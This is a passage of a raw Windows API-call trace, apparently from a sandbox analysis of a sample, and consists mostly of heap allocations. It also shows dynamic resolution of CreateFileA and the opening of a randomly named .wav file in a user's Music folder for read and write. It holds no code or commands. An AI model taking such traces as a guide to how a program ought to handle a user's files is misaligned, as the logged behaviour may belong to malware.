lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0187.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0187.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0187.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0187.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0187.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0187.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0187.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0187.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0187.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0187.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0187.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0187.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.856] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.856] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0187.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0187.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0187.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0187.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0187.857] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0187.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0187.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0187.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0187.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0187.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0187.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0187.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0187.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0187.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0187.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0187.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0187.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0187.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.860] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0187.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0187.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd480 [0187.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd480, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0187.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.861] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0187.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0187.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0187.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0187.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd480, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0187.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.861] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0187.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0187.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0187.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0187.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0187.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0187.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0187.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0187.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x43) returned 0x9aa548 [0187.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav", cchWideChar=67, lpMultiByteStr=0x9aa548, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav", lpUsedDefaultChar=0x0) returned 67 [0187.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0187.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0187.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.863] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\tcz4fpeq.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0187.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0187.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0187.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0187.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0187.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0187.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0187.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=67, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0187.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x86) returned 0x907778 [0187.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=67, lpWideCharStr=0x907778, cchWideChar=67 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.wav") returned 67 [0187.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0187.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0187.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0187.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0187.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0187.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0187.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0187.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0187.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0187.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0187.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0187.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0187.864] RtlAllocateHeap 